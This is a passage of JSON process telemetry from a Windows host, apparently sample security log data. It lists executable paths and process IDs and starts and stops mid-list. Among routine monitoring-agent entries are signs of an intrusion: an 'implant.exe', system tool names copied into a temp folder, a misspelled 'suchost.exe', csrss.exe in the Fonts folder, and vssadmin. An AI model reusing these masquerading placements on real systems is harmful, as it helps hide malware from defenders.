State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\"],\"ProcessId\":[\"0x888\",\"0x1610\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xb10\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x570\",\"0x280\",\"0x888\",\"0x888\",\"0x1490\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1630\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1094\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xc08\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x13fc\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x11b0\",\"0x280\",\"0x888\",\"0x888\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1728\",\"0xbc8\",\"0xbc8\",\"0x176c\",\"0xbc8\",\"0xbc8\",\"0x17cc\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x888\",\"0x690\",\"0x280\",\"0x888\",\"0x280\",\"0x440\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x2a8\",\"0xbc8\",\"0xfc0\",\"0x77c\",\"0x132c\",\"0xbc8\",\"0x132c\",\"0x230\",\"0x280\",\"0xbc8\",\"0xbc8\",\"0xc18\",\"0xbc8\",\"0x1274\",\"0xbc8\",\"0x230\",\"0xd10\",\"0xbc8\",\"0x103c\",\"0xbc8\",\"0xbb4\",\"0xbc8\",\"0x123c\",\"0x154c\",\"0xbc8\",\"0x1580\",\"0xbc8\",\"0x15b4\",\"0xbc8\",\"0x15e8\",\"0xbc8\",\"0x161c\",\"0xbc8\",\"0x1650\",\"0xbc8\",\"0x1684\",\"0xbc8\"